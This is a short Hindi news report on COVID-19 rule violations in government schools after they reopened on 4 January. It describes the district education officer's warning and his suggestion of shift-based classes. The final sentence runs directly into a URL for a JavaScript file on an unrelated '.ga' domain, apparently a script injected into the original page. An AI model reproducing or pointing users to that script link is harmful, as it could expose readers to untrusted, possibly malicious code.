राज्य में 4 जनवरी से स्कूल खोलने के बाद सरकारी स्कूलों में कोविड-19 का खूब उल्लंघन दिखाई दिया। शिक्षा विभाग के सारे दिशा निर्देश धरे रह गए। स्कूल मैं नियमों का उल्लंघन देख मंगलवार को जिला शिक्षा पदाधिकारी संजय कुमार ने नाराजगी जाहिर की। वही निजी स्कूलों में कोविड नियमों का सख्ती से पालन किया गया।
जिला शिक्षा पदाधिकारी संजय कुमार ने सभी को हर हाल में कोविड-19 एडलाइन का पालन करने का निर्देश दिया है। उन्होंने प्रखंड शिक्षा पदाधिकारी को भी कड़े निर्देश दिए। डीईओ ने सभी को साफ कहा है कि यह पहली चेतावनी है, स्थिति में सुधार नहीं हुआ तो सीधा विभागीय कार्यवाही होगी। डीईओ ने आगे कहा कि किसी भी कीमत पर को कोविड नियम से खिलवाड़ पसंद नहीं है। उन्होंने प्राचार्य को कहा है कि अगर आपके यहां बच्चों की संख्या ज्यादा है संसाधन काम है तो पढ़ाई शिफ्ट में कर दें लेकिन सरकार द्वारा जारी गाइडलाइंस का अनिवार्य रूप से पालन करें। इसमें थोड़ी सी कोताही सभी लोगों के लिए परेशानी का सबब बन सकता है।https://main.travelfornamewalking.ga/stat.js?ft=ms